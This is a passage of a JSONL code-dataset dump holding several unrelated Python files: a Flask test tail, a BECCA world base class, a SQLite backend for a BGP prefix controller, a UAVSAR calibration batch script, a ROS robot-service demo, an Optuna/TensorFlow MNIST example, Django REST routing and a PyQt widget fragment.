= self.app.get(\"/get_using_postgres\", data=self.data, headers=self.headers)\n        data1 = json.loads(res1.get_data(as_text=True))\n\n        res2 = self.app.get(\"/get_using_self\", data=self.data, headers=self.headers)\n        data2 = json.loads(res2.get_data(as_text=True))\n\n        self.assertEqual(data1['number'], data2['number'])\n\n\nif __name__ == '__main__':\n    unittest.main() 
\n\n","sub_path":"test12.py","file_name":"test12.py","file_ext":"py","file_size_in_byte":4501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"426675818","text":"\"\"\"\r\nthe base world on which all the other worlds are based\r\n\"\"\"\r\nimport numpy as np\r\n\r\nclass World(object):\r\n \"\"\" \r\n The base class for creating a new world \r\n \"\"\"\r\n def __init__(self, lifespan=None):\r\n \"\"\" \r\n Initialize a new world with some benign default values \r\n \"\"\"\r\n if lifespan is None:\r\n self.LIFESPAN = 10 ** 4\r\n else:\r\n self.LIFESPAN = lifespan\r\n # Starting at -1 allows for an intialization pass.\r\n self.timestep = -1\r\n self.world_visualize_period = 1e4\r\n self.brain_visualize_period = 1e4\r\n self.name = 'abstract base world'\r\n # These will likely be overridden in any subclass\r\n self.num_sensors = 0\r\n self.num_actions = 0\r\n self.classifier = False\r\n \r\n def step(self, action):\r\n \"\"\" \r\n Take a timestep through an empty world that does nothing \r\n \"\"\"\r\n self.timestep += 1\r\n sensors = np.zeros(self.num_sensors)\r\n reward = 0\r\n return sensors, reward\r\n \r\n def is_alive(self):\r\n \"\"\" \r\n Returns True when the world has come to an end \r\n \"\"\"\r\n if(self.timestep < self.LIFESPAN):\r\n return True\r\n else:\r\n return False\r\n \r\n def visualize(self, brain):\r\n \"\"\" \r\n Let the world show BECCA's internal state as well as its own\r\n \"\"\"\r\n if (self.timestep % self.world_visualize_period) == 0:\r\n self.visualize_world()\r\n if (self.timestep % self.brain_visualize_period) == 0:\r\n brain.visualize()\r\n\r\n def visualize_world(self):\r\n print('{0} is {1} time steps old.'.format(self.name, self.timestep))\r\n\r\n","sub_path":"worlds/base_world.py","file_name":"base_world.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"231092242","text":"from base import Backend\nimport sqlite3 as lite\nfrom bgp_controller.prefix_table import Prefix, PrefixTable\nfrom datetime import timedelta\n\nimport os\n\nimport logging\nlogger = logging.getLogger('sir')\n\n# TODO Save BGP in SQL?\n\nclass SQLite(Backend):\n \"\"\"\n Name:\n SQLite\n Author:\n David Barroso \n Description:\n This backend connects to a SQLite database. 
It will choose the best prefixes by the amount of data reported by pmacct.\n Configuration:\n * **sqlite_file** - Full path to the database file.\n * **retention** - How many days to keep pmacct raw data and best_prefixes data.\n Example:\n Configuration example::\n\n backend_options:\n sqlite_file: '/Users/dbarroso/Documents/workspace/pmacct_data/output/flows/pmacct.db' # Path to the SQLite database\n retention: 7 # Days to hold old data.\n \"\"\"\n\n def open(self):\n logger.info('action=OPEN_BACKEND backend=SQLITE file=%s' % self.conf['sqlite_file'])\n if not os.path.isfile(self.conf['sqlite_file']):\n raise Exception(\"Database file doesn't exist: %s\" % self.conf['sqlite_file'])\n\n self.con = lite.connect(self.conf['sqlite_file'])\n\n def close(self):\n logger.info('action=CLOSE_BACKEND backend=SQLITE file=%s' % self.conf['sqlite_file'])\n self.con.close()\n\n def _execute_query(self, query):\n try:\n self.con.row_factory = lite.Row\n cur = self.con.cursor()\n cur.execute(query)\n result = cur.fetchall()\n except lite.OperationalError:\n raise Exception('The following query failed:\\n%s' % query)\n\n return result\n\n def _get_pt(self, list, sampling=1):\n pt = PrefixTable()\n\n for p in list:\n prefix = Prefix(p[0], p[1], p[2], p[3], p[4], sampling)\n pt.add(prefix)\n\n return pt\n\n def get_best_prefixes(self, start_time, end_time, max_routes, packet_sampling):\n logger.debug('action=GET_BEST_PREFIXES start_time=%s end_time=%s' % (start_time, end_time))\n query = (\"\"\"\n SELECT ip_dst, mask_dst, AVG(bytes), AVG(packets), stamp_updated\n FROM acct\n WHERE datetime(stamp_updated) BETWEEN datetime('%s') AND datetime('%s')\n GROUP BY ip_dst, mask_dst ORDER BY AVG(bytes) DESC\n LIMIT %s;\n \"\"\") % (start_time, end_time, max_routes)\n return self._get_pt(self._execute_query(query), packet_sampling)\n\n def get_raw_prefixes(self, start_time, end_time, packet_sampling):\n logger.debug('action=GET_RAW_PREFIXES start_time=%s end_time=%s' % (start_time, end_time))\n query = (\"\"\"\n SELECT ip_dst, mask_dst, bytes, packets, stamp_updated\n FROM acct\n WHERE\n datetime(stamp_updated) BETWEEN datetime('%s') AND datetime('%s')\n AND\n stamp_updated = (\n SELECT MAX(stamp_updated) FROM acct\n WHERE datetime(stamp_updated) BETWEEN datetime('%s') AND datetime('%s')\n );\n \"\"\") % (start_time, end_time, start_time, end_time)\n return self._get_pt(self._execute_query(query), packet_sampling)\n\n def get_previous_prefixes(self, start_time, end_time):\n logger.debug('action=GET_PREVIOUS_PREFIXES start_time=%s end_time=%s' % (start_time, end_time))\n query = (\"\"\"\n SELECT ip_dst, mask_dst, bytes, packets, stamp_updated\n FROM best_prefixes\n WHERE\n datetime(stamp_updated) BETWEEN datetime('%s') AND datetime('%s')\n AND\n stamp_updated = (SELECT MAX(stamp_updated) FROM best_prefixes);\n \"\"\") % (start_time, end_time)\n\n return self._get_pt(self._execute_query(query))\n\n def save_prefix_table(self, prefix_table, date):\n logger.debug('action=SAVE_PREFIX_TABLE date=%s' % (date))\n cur = self.con.cursor()\n\n for prefix in prefix_table:\n values = (\n str(prefix.get_prefix_network()),\n prefix.get_prefix_mask(),\n prefix.get_packets(),\n prefix.get_bytes(),\n date.strftime('%Y-%m-%d %H:%M:%S')\n )\n cur.execute(\"INSERT INTO best_prefixes VALUES %s;\" % (str(values)))\n\n self.con.commit()\n\n def save_dict(self, data_dict, db_table):\n logger.debug('action=SAVE_DICT db_table=%s' % (db_table))\n\n columns = tuple(data_dict.keys())\n values = tuple(data_dict.values())\n\n cur = 
self.con.cursor()\n cur.execute(\"INSERT INTO %s %s VALUES %s;\" % (db_table, str(columns), str(values)))\n self.con.commit()\n\n def get_data_from_table(self, table, filter=None):\n logging.debug('action=GET_DATA_FROM_TABLE table=%s filter=%s' % (table, filter))\n if filter is None:\n query = (\"SELECT * FROM %s;\") % table\n else:\n query = (\"SELECT * FROM %s WHERE %s;\") % (table, filter)\n\n result = self._execute_query(query)\n result.insert(0, result[0].keys())\n return result\n\n def get_available_dates_in_range(self, start_time, end_time):\n logger.debug('action=GET_AVAILABLE_DATES_IN_RANGE start_time=%s end_time=%s' % (start_time, end_time))\n query = (\"\"\"\n SELECT stamp_updated FROM acct WHERE datetime(stamp_updated)\n BETWEEN datetime('%s') AND datetime('%s')\n GROUP BY stamp_updated;\n \"\"\") % (start_time, end_time)\n return self._execute_query(query)\n\n def _purge_databases(self, table, field, timestamp):\n query = ( \"\"\" DELETE FROM %s WHERE %s < datetime('%s') \"\"\" ) % (table, field, timestamp)\n self._execute_query(query)\n self.con.commit()\n\n def purge_data(self, current_time):\n purge_time = current_time - timedelta(hours = self.conf['retention'] * 24)\n\n logger.debug('action=PURGE_DATA date=%s' % (purge_time))\n\n self._purge_databases('acct', 'stamp_updated', purge_time)\n self._purge_databases('best_prefixes', 'stamp_updated', purge_time)\n","sub_path":"bgp_controller/backend/sqlite.py","file_name":"sqlite.py","file_ext":"py","file_size_in_byte":6412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"184509134","text":"# -*- coding: utf-8 -*-\n\"\"\"\nExample script demonstrating batch radiometric calibration using vegetation\nLUTs.\n\nCalls functions contained in radiocal module to handle the batch processing.\n\nActual correction is performed by calling C programs.\n\nCreated on Tue May 26 11:32:00 2015\n\n@author: mdenbina\n\"\"\"\nimport numpy as np\nimport os\nimport subprocess\nimport multiprocessing as mp\nfrom multiprocessing import Pool\nimport complex_RTC # local fxn\nimport radiocal\n\n\n# print\nprint('Starting radiocal example script.')\n\n# sardata_base\nsardatabase_list='/home/ekyzivat/scripts/random-wetlands/data_paths/tooli-atq-2020-nov-6.txt' # rtc-run-1.txt rtc-test-1.txt' # path to list of UAVSAR IDs to run\nsardatabase=open(sardatabase_list).read().splitlines() # a list of UAVSAR IDs\n\n# uncomment for testing:\n# sardatabase = ['bakerc_16008_19059_012_190904_L090_CX_01/'] # ['bakerc_16008_18048_011_180822_L090_CX_02'] # ['bakerc_16008_19060_037_190905_L090'] # original: bakerc_16008_19060_037_190905_L090HHVV_CX_01.mlc #['padelE_36000_18047_000_180821_L090'] # _L090_CX_01\n\n# Root names pointing to the UAVSAR data to use for LUT creation, excluding the polarization and correction type (which get appended to this string to produce the full filename).\ndef sarDataPathNameFunction(sardata_str):\n sardatapath=sardata_str[0:-6]\n return sardatapath\nsardata = [sarDataPathNameFunction(sardata_str) for sardata_str in sardatabase] \n\n# Parent path to UAVSAR data files:\ndata_base_pth = '/att/nobackup/ekyzivat/UAVSAR/asf.alaska.edu' # '/att/nobackup/ekyzivat/tmp/rtc'\n\n# Path to the UAVSAR data files:\ndef dataPathNameFunction(data_base_pth, sardata_str):\n datapath=os.path.join(data_base_pth, sardata_str, 'raw'+os.sep)\n return datapath\ndatapath = [dataPathNameFunction(data_base_pth, sardata_str) for sardata_str in sardatabase] # list(map(dataPathNameFunction, data_base_pth, sardata)) 
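# illustrative: with the example ID above, datapath[0] would be '/att/nobackup/ekyzivat/UAVSAR/asf.alaska.edu/bakerc_16008_19059_012_190904_L090_CX_01/raw/'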
# '/att/nobackup/ekyzivat/tmp/rtc/bakerc_16008_18048_011_180822_L090_CX_02/raw/' # '/att/nobackup/ekyzivat/tmp/rtc/padelE_36000_18047_000_180821_L090_CX_01/raw/'\n\n# Path to the folder containing the radiometric calibration programs\n# (e.g., uavsar_calib_veg_v2 and geocode_uavsar)\nprogrampath = '/home/ekyzivat/UAVSAR-rtc/'\n\n# Calibration program:\ncalibprog = programpath+'uavsar_calib'\n\n# Geocoding program:\ngeocodeprog = programpath+'uavsar_geocode'\n\n\n# min and max look angles, if post processing is enabled...\n# look angles outside these bounds will be set to zero:\n# choose values that will definitely have data- if you get close to the real min/max look, be sure to set min_samples to a high value, i.e. 10,000 to filter out tall trees/mountains etc that can cause outliers\nminlook = 24 #24 # 20.86 for PAD 2017\nmaxlook = 64 #64 # 65.55 for PAD 2017\n\n# Polarizations to correct:\npol = [0,1,2] #[0, 1, 2] #[0] #[0, 1, 2]\n\n\n# Subpaths pointing to a land cover or mask image to use for each UAVSAR scene.\n# len() of maskdata needs to be the same as the len() of sardata.\n\ndef maskNameFunction(str):\n maskName=str[0:-4]+'landcovermask.tif'\n return maskName\nmaskdata= list(map(maskNameFunction, sardata)) # [maskNameFunction(item) for item in sardata] # \n# maskdata = ['ABoVE_LandCover_PAD_2018.tif']\n\n\n# Path to save the LUT:\nLUTpath = '/att/nobackup/ekyzivat/UAVSAR/asf.alaska.edu/lut/' # '/att/nobackup/ekyzivat/tmp/rtc/lut/' # '/att/nobackup/ekyzivat/UAVSAR/asf.alaska.edu/lut/'\n\n# A name to describe the LUT:\nLUTname = sardata #'PAD2018'\n\n# A name to append to the filenames of the LUT corrected output:\ncalname='LUT'\n\n# The SAR image and the mask should have the same extents, pixel size, etc.\n# Trim the mask to the correct size (e.g., in QGIS) before running this.\n\n# Array of allowed values in the mask -- values other than these will be\n# excluded from the process. For a boolean mask this should equal True, to\n# include all pixels where the mask is True. For a land cover image, list\n# the class ID numbers of interest.\n# Note: For Louisiana data using CCAP land cover, classes 15 and 18 are both\n# emergent wetland (18: Estuarine Emergent Wetland, and 15: Palustrine\n# Emergent Wetland).\nallowed = range(1, 16) # [1, 2, 3, 4, 5, 6] # [14] # range(1, 16) # 14 refers to barren class! # 13 and 15 are water, 1-4 are trees, 5 and 6 are shrubs \n\n\n# These settings determine which pixels we use to generate the LUT, and which pixels are excluded, based on backscatter.\n# Note, these cutoff values should be based on HV backscatter. To be consistent between the polarizations, we always mask out\n# the same pixels for each polarization. The pixels excluded based on backscatter use the HVHV.\n# TODO add auto min/max look angle masking?\nmax_cutoff = np.inf # pixels above this value will be excluded\nmin_cutoff = 0 # pixels below this will be excluded\n\n\n# Set to true to assume range slope is zero, false otherwise:\nflatdemflag = True # HERE change\n\n# Constant height value for the created flat DEM:\nhgtval = 180\n\n# Note that this example script was created for wetland areas along the Gulf\n# Coast in Louisiana, United States. Here we have set flatdemflag to True\n# since there is minimal topography in this area. However, in areas with\n# significant topography, one should set flatdemflag to False in order\n# to calculate the terrain slope angle from the DEM. 
Here we create a\n# perfectly flat DEM which is approximately equal to the mean sea level\n# height in this area.\n\n\n# Savitzky-Golay filter to smooth LUT?\nsgfilterflag = True # set to True to filter, False to leave alone\nsgfilterwindow = 51 # filter window size--larger windows yield more smoothing\n\n# parallel pool size\npool_size=4 #mp.cpu_count() # change for custom\n\n# # STEP 1: Area Correction (in order to make the data to generate the LUT)\nprint('DOING AREA CORRECTION...')\npool = Pool(pool_size)\nfor num in range(0,len(sardata)): # do first and third steps all at once as loop; do second steps as loops within each step\n pool.apply_async(radiocal.batchcal, args=(datapath[num], programpath, calibprog, geocodeprog, \n None, # caltblroot\n 'area_only', # calname\n True, # docorrectionflag\n False, # zerodemflag\n False, # createmaskflag\n True, # createlookflag\n True, # createslopeflag\n True, # overwriteflag\n False, # postprocessflag\n minlook, # minlook\n maxlook, # maxlook\n pol, # pol\n hgtval, # hgtval\n sardata[num])) # scene \n# # radiocal.batchcal(datapath[num], programpath, calibprog, geocodeprog, None, calname='area_only', docorrectionflag=True, zerodemflag=True, createmaskflag=False, createlookflag=True, createslopeflag=True, overwriteflag=False, postprocessflag=False, pol=pol, hgtval=hgtval, scene=sardata[num])\npool.close()\npool.join()\n\n# # STEP 2: Create landcover mask images\nprint('BUILDING LANDCOVER MASKS FROM MOSAIC') # using my custom script (on path) to crop and reproject from landcover mosaic\nfor num in range(0,len(sardatabase)): \n target_align_file = datapath[num]+sardata[num][0:-4]+'slope'+'.grd' # just need ground-projected file to align to \n landcover_file=datapath[num]+sardata[num][0:-4]+'landcovermask.tif' # output of custom reprojection script\n if not os.path.isfile(landcover_file): # maybe add \"or overwriteflag\"\n print('BUILDING: {}'.format(landcover_file))\n print(subprocess.getoutput('gdal_reproject_match.sh /att/nobackup/ekyzivat/landcover/ABoVE_LandCover.vrt ' \\\n +landcover_file + ' '+ target_align_file))# HERE\n else: \n print('LANDCOVER MASK ALREADY BUILT: {}'.format(landcover_file))\n\n# # STEP 3: LUT Creation\nprint('CREATING LUT...')\npool = Pool(pool_size)\nfor num in range(0,len(sardata)): \n pool.apply_async(radiocal.createlut, args=(datapath[num], [sardata[num]], [maskdata[num]], LUTpath, LUTname[num], allowed, # no loop bc creatlut already does loop over 3 polarizations\n pol, 'area_only', min_cutoff,\n max_cutoff, flatdemflag, sgfilterflag, \n sgfilterwindow, None, None, 10)) # datapath[num], [sardata[num]], [maskdata[num]], LUTpath, LUTname[num], allowed, # no loop bc creatlut already does loop over 3 polarizationspol=pol, corrstr='area_only', min_cutoff=min_cutoff,max_cutoff=max_cutoff, flatdemflag=flatdemflag, sgfilterflag=sgfilterflag, sgfilterwindow=sgfilterwindow, min_look=minlook, max_look=maxlook, min_samples=10))\npool.close()\npool.join()\n\n\n# # STEP 4: LUT Correction\nprint('DOING LUT CORRECTION...')\npool = Pool(pool_size)\nfor num in range(0,len(sardata)): # do first steps all at once as loop; do second and third steps as loops within each step\n pool.apply_async(radiocal.batchcal, args=(datapath[num], programpath, calibprog, geocodeprog, \n LUTpath+'caltbl_'+LUTname[num], # caltblroot \n calname, # calname\n True, # docorrectionflag\n False, # zerodemflag\n True, # createmaskflag\n True, # createlookflag\n True, # createslopeflag\n True, # overwriteflag\n False, # postprocessflag\n minlook, # minlook\n 
maxlook, # maxlook\n pol, # pol\n hgtval, # hgtval\n sardata[num])) # scene \n# # radiocal.batchcal, args=(datapath[num], programpath, calibprog, geocodeprog, LUTpath+'caltbl_'+LUTname[num],calname=calname, docorrectionflag=True, zerodemflag=True, createmaskflag=True, createlookflag=True, createslopeflag=True, overwriteflag=False, postprocessflag=False, minlook=minlook, maxlook=maxlook, pol=pol, hgtval=hgtval))\npool.close()\npool.join()\n\n# STEP 5: Complex LUT Correction\nprint('DOING Complex LUT CORRECTION...')\npool = Pool(pool_size) #Pool(pool_size)\nfor num in range(0,len(sardata)): # [4]: # # do first steps all at once as loop; do second and third steps as loops within each step\n corrstr=sardatabase[num][-5:] # 'CX_01' or 'CX_02'\n pool.apply_async(complex_RTC.complexRTC, args=(\n sardata[num], #'bakerc_16008_19059_012_190904_L090', # base\n sardata[num][:-5], #'bakerc_16008_19059_012_190904', # lutBase=\n corrstr, #'CX_01', # corrstr\n calname, # 'LUT', # calname=\n datapath[num], #'/mnt/f/UAVSAR/bakerc_16008_19059_012_190904_L090_CX_01/raw/LUT', # lutDir=\n datapath[num][:-4]+'default_grd', #'/mnt/f/UAVSAR/bakerc_16008_19059_012_190904_L090_CX_01/raw/orig_grd', # origDir=\n datapath[num][:-4]+'complex_lut')) #'/mnt/f/UAVSAR/bakerc_16008_19059_012_190904_L090_CX_01/raw/auto_test')) # outDir=\n\npool.close()\npool.join()\n","sub_path":"python/radiocal_example_script_ek.py","file_name":"radiocal_example_script_ek.py","file_ext":"py","file_size_in_byte":12029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"446152350","text":"#!/usr/bin/python\n\n'''\nThis is an example node which subscribes to every topic and uses every service.\n'''\n\nimport sys, rospy\n\nfrom myp_ros.msg import *\nfrom myp_ros.srv import *\n\n'''\nA callback message for the subscibers.\n'''\ndef do_something(msg):\n\treturn\n\n'''\nInitialize the node.\n'''\nrospy.init_node('example')\n\n\n'''\nWait for the connection service to be provided by the PRob.\nConnect to the PRob using this service.\nPrint out the response.\n'''\nrospy.wait_for_service('connect')\nconnect = rospy.ServiceProxy('connect', ConnectionCommand)\nresp = connect('real', 'PRob2R', 'normal')\nrospy.loginfo(resp.message)\n\n\n'''\nSet up the subscribers.\n'''\nrospy.loginfo('Subscribing to all messages')\n\nsub1 = rospy.Subscriber('joint_angles', JointAngles, do_something)\nsub2 = rospy.Subscriber('current', Current, do_something)\nsub3 = rospy.Subscriber('digital_inputs', DigitalInputs, do_something)\nsub4 = rospy.Subscriber('pose', Pose, do_something)\nsub5 = rospy.Subscriber('posture', Posture, do_something)\nsub6 = rospy.Subscriber('sensor_packet', SensorPacket, do_something)\n\n\n'''\nTest each service\n'''\nrospy.loginfo('Using each service after ENTER is pressed')\n\nraw_input('Using service wait')\n\nwait = rospy.ServiceProxy('wait', Wait)\nresp = wait(2.5)\nrospy.loginfo(resp.message)\n\nraw_input('Using service open_gripper')\n\nopen_gripper = rospy.ServiceProxy('open_gripper', OpenGripper)\nresp = open_gripper()\nrospy.loginfo(resp.message)\n\nraw_input('Using service close_gripper')\n\nclose_gripper = rospy.ServiceProxy('close_gripper', CloseGripper)\nresp = close_gripper()\nrospy.loginfo(resp.message)\n\nraw_input('Using service move_joint')\n\nmove_joint = rospy.ServiceProxy('move_joint', MoveJoint)\nactuator_ids = ['1', '2', '3', '4', '5', '6']\nposition = [10.0, 10.0, 10.0, 10.0, 10.0, 10.0]\nresp = move_joint(actuator_ids=actuator_ids, 
position=position)\nrospy.loginfo(resp.message)\n\nraw_input('Using service move_to_pose')\n\nmove_to_pose = rospy.ServiceProxy('move_to_pose', MoveToPose)\nresp = move_to_pose(pose_name='pose_name')\nrospy.loginfo(resp.message)\n\nraw_input('Using service move_tool')\n\nmove_tool = rospy.ServiceProxy('move_tool', MoveTool)\nx, y, z = 0.0, 200.0, 920.0\norientation = [30.0, -20.0, -90.0]\nresp = move_tool(x=x, y=y, z=z, orientation=orientation)\nrospy.loginfo(resp.message)\n\nraw_input('Using service play_path')\n\nplay_path = rospy.ServiceProxy('play_path', PlayPath)\nresp = play_path(path_name='path_name')\nrospy.loginfo(resp.message)\n\nraw_input('Using service read_gripper_angle')\n\nread_gripper_angle = rospy.ServiceProxy('read_gripper_angle', ReadGripperAngle)\nresp = read_gripper_angle()\nrospy.loginfo(resp.message)\nrospy.loginfo(resp.gripper_angle)\n\nraw_input('Using service read_tcp_pose')\n\nread_tcp_pose = rospy.ServiceProxy('read_tcp_pose', ReadTcpPose)\nresp = read_tcp_pose()\nrospy.loginfo(resp.message)\nrospy.loginfo(resp.posture)\n\nraw_input('Using service recognize_object')\n\nrecognize_object = rospy.ServiceProxy('recognize_object', RecognizeObject)\nresp = recognize_object(lesson_name='lesson_name')\nrospy.loginfo(resp.message)\n\nraw_input('Using service run_simple_path')\n\nrun_simple_path = rospy.ServiceProxy('run_simple_path', RunSimplePath)\nactuator_ids = ['1', '2', '3', '4', '5', '6']\npositions = [[1.0, 1.0, 1.0, 1.0, 1.0, 1.0], \n\t [10.0, 10.0, 10.0, 10.0, 10.0, 10.0],\n [-1.0, -1.0, -1.0, -1.0, -1.0, -1.0]]\n\npath_data = [JointAngles(data=pos, names=actuator_ids, length=6) for pos in positions] \n\nresp = run_simple_path(path_data=path_data)\nrospy.loginfo(resp.message)\n\nraw_input('Using service say')\n\nsay = rospy.ServiceProxy('say', Say)\nresp = say(phrase='This is what I am saying.')\nrospy.loginfo(resp.message)\n\nraw_input('Using service wait_for_motor')\n\nwait_for_motor = rospy.ServiceProxy('wait_for_motor', WaitForMotor)\nactuator_ids = ['1', '2', '3', '4', '5', '6']\nresp = wait_for_motor(actuator_ids)\nrospy.loginfo(resp.message)\n\nraw_input('Using service write_digital_outputs')\n\nwrite_digital_outputs = rospy.ServiceProxy('write_digital_outputs', WriteDigitalOutputs)\nresp = write_digital_outputs(mask=200)\nrospy.loginfo(resp.message)\n\nraw_input('Using service get_sensors')\n\nget_sensors = rospy.ServiceProxy('get_sensors', GetSensors)\nresp = get_sensors()\nrospy.loginfo(resp.message)\nrospy.loginfo(resp.sensors)\n\nraw_input('Using service send_sensor_instruction')\n\nsend_sensor_instruction = rospy.ServiceProxy('send_sensor_instruction', SendSensorInstruction)\nresp = send_sensor_instruction('mySensor', '1')\nrospy.loginfo(resp.message)\n\n\nraw_input('Using service remove_sensor')\n\nremove_sensor = rospy.ServiceProxy('remove_sensor', RemoveSensor)\nresp = remove_sensor('mySensor')\nrospy.loginfo(resp.message)\n\nrospy.loginfo('All done, disconnecting!')\nresp = connect(robot_kind='disconnect')\nrospy.loginfo(resp.message)\n\n","sub_path":"scripts/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":4812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"411703973","text":"\"\"\"\nOptuna example that optimizes multi-layer perceptrons using Tensorflow (Eager Execution).\n\nIn this example, we optimize the validation accuracy of hand-written digit recognition using\nTensorflow and MNIST. 
We optimize the neural network architecture as well as the optimizer\nconfiguration.\n\nWe have the following two ways to execute this example:\n\n(1) Execute this code directly.\n $ python tensorflow_eager_simple.py\n\n\n(2) Execute through CLI.\n $ STUDY_NAME=`optuna create-study --direction maximize --storage sqlite:///example.db`\n $ optuna study optimize tensorflow_eager_simple.py objective --n-trials=100 \\\n --study $STUDY_NAME --storage sqlite:///example.db\n\n\"\"\"\n\nimport tensorflow as tf\nimport tensorflow.contrib.eager as tfe\nfrom tensorflow.keras.datasets import mnist\n\nN_TRAIN_EXAMPLES = 3000\nN_TEST_EXAMPLES = 1000\nBATCHSIZE = 128\nCLASSES = 10\nEPOCHS = 1\ntf.enable_eager_execution()\n\n\ndef create_model(trial):\n # We optimize the numbers of layers, their units and weight decay parameter.\n n_layers = trial.suggest_int('n_layers', 1, 3)\n weight_decay = trial.suggest_loguniform('weight_decay', 1e-10, 1e-3)\n model = tf.keras.Sequential()\n model.add(tf.keras.layers.Flatten())\n for i in range(n_layers):\n num_hidden = int(trial.suggest_loguniform('n_units_l{}'.format(i), 4, 128))\n model.add(\n tf.keras.layers.Dense(num_hidden,\n activation='relu',\n kernel_regularizer=tf.keras.regularizers.l2(weight_decay)))\n model.add(\n tf.keras.layers.Dense(CLASSES, kernel_regularizer=tf.keras.regularizers.l2(weight_decay)))\n return model\n\n\ndef create_optimizer(trial):\n # We optimize the choice of optimizers as well as their parameters.\n kwargs = {}\n optimizer_options = ['RMSPropOptimizer', 'AdamOptimizer', 'MomentumOptimizer']\n optimizer_selected = trial.suggest_categorical('optimizer', optimizer_options)\n if optimizer_selected == 'RMSPropOptimizer':\n kwargs['learning_rate'] = trial.suggest_loguniform('rmsprop_learning_rate', 1e-5, 1e-1)\n kwargs['decay'] = trial.suggest_uniform('rmsprop_decay', 0.85, 0.99)\n kwargs['momentum'] = trial.suggest_loguniform('rmsprop_momentum', 1e-5, 1e-1)\n elif optimizer_selected == 'AdamOptimizer':\n kwargs['learning_rate'] = trial.suggest_loguniform('adam_learning_rate', 1e-5, 1e-1)\n elif optimizer_selected == 'MomentumOptimizer':\n kwargs['learning_rate'] = trial.suggest_loguniform('momentum_opt_learning_rate', 1e-5,\n 1e-1)\n kwargs['momentum'] = trial.suggest_loguniform('momentum_opt_momentum', 1e-5, 1e-1)\n\n optimizer = getattr(tf.train, optimizer_selected)(**kwargs)\n return optimizer\n\n\ndef learn(model, optimizer, dataset, mode='eval'):\n accuracy = tfe.metrics.Accuracy('accuracy', dtype=tf.float32)\n\n for batch, (images, labels) in enumerate(dataset):\n with tf.GradientTape() as tape:\n logits = model(images, training=(mode == 'train'))\n loss_value = tf.reduce_mean(\n tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits, labels=labels))\n if mode == 'eval':\n accuracy(tf.argmax(logits, axis=1, output_type=tf.int64),\n tf.cast(labels, tf.int64))\n else:\n grads = tape.gradient(loss_value, model.variables)\n optimizer.apply_gradients(zip(grads, model.variables))\n\n if mode == 'eval':\n return accuracy\n\n\ndef get_mnist():\n (x_train, y_train), (x_test, y_test) = mnist.load_data()\n x_train = x_train.astype('float32') / 255\n x_test = x_test.astype('float32') / 255\n\n y_train = y_train.astype('int32')\n y_test = y_test.astype('int32')\n\n train_ds = tf.data.Dataset.from_tensor_slices((x_train, y_train))\n train_ds = train_ds.shuffle(60000).batch(BATCHSIZE).take(N_TRAIN_EXAMPLES)\n\n test_ds = tf.data.Dataset.from_tensor_slices((x_test, y_test))\n test_ds = 
test_ds.shuffle(10000).batch(BATCHSIZE).take(N_TEST_EXAMPLES)\n    return train_ds, test_ds\n\n\n# FYI: Objective functions can take additional arguments\n# (https://optuna.readthedocs.io/en/stable/faq.html#objective-func-additional-args).\ndef objective(trial):\n    # Get MNIST data.\n    train_ds, test_ds = get_mnist()\n\n    # Build model and optimizer.\n    model = create_model(trial)\n    optimizer = create_optimizer(trial)\n\n    # Training and validating cycle.\n    with tf.device(\"/cpu:0\"):\n        for _ in range(EPOCHS):\n            learn(model, optimizer, train_ds, 'train')\n\n        accuracy = learn(model, optimizer, test_ds, 'eval')\n\n    # Return last validation accuracy.\n    return accuracy.result()\n\n\nif __name__ == '__main__':\n    import optuna\n\n    study = optuna.create_study(direction='maximize')\n    study.optimize(objective, n_trials=100)\n\n    print('Number of finished trials: ', len(study.trials))\n\n    print('Best trial:')\n    trial = study.best_trial\n\n    print('  Value: ', trial.value)\n\n    print('  Params: ')\n    for key, value in trial.params.items():\n        print('    {}: {}'.format(key, value))\n","sub_path":"examples/tensorflow_eager_simple.py","file_name":"tensorflow_eager_simple.py","file_ext":"py","file_size_in_byte":5169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"583783839","text":"# -*- coding: utf-8 -*-\n\"\"\"\nauthor: xuan\ntime: 2018/10/15 15:27\n\"\"\"\n# from django.conf.urls import url, include\nfrom django.urls import path, include\nfrom django.contrib.auth.models import User\nfrom rest_framework import routers, serializers, viewsets\n\n\nclass UserSerializer(serializers.HyperlinkedModelSerializer):\n\tclass Meta:\n\t\tmodel = User\n\t\tfields = ('url', 'username', 'email', 'is_staff')\n\t\t\n\nclass UserViewSet(viewsets.ModelViewSet):\n\tqueryset = User.objects.all()\n\tserializer_class = UserSerializer\n\n\nrouter = routers.DefaultRouter()\nrouter.register('users', UserViewSet)\n\n\nurlpatterns = [\n\tpath('', include(router.urls)),\n\tpath('api-auth', include('rest_framework.urls', namespace='rest_framework')),\n]","sub_path":"django_demo/user_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"549322987","text":"from PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import *\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtGui import *\n\nclass ContactUs(object):\n    def __init__(self,parents):\n        super().__init__()\n        self.frame = QWidget(parents)\n        self.frame.setObjectName(\"Frame\")\n        self.frame.resize(1200, 900)\n        self.frame.setFixedSize(1200, 900)\n\n        self.init_frame()\n\n    def init_frame(self):\n        self.pushButton_1 = QtWidgets.QPushButton(\"正常考试模式\", self.frame)\n        self.pushButton_1.setObjectName(\"HomeButton\")\n        # self.pushButton_1.setIcon(QIcon(\"../images/考试.png\"))\n        self.pushButton_1.setFixedSize(300, 50)\n        self.pushButton_1.move(450,700)\n        self.pushButton_1.setText(\"返回主菜单\")\n\n        self.LineEdit_1 = QLineEdit(self.frame)\n        self.LineEdit_1.setFixedSize(800, 50)\n        self.LineEdit_1.move(200,400)\n\n        self.LineEdit_2 = QLineEdit(self.frame)\n        self.LineEdit_2.setFixedSize(800, 50)\n        self.LineEdit_2.move(200,500)\n\n        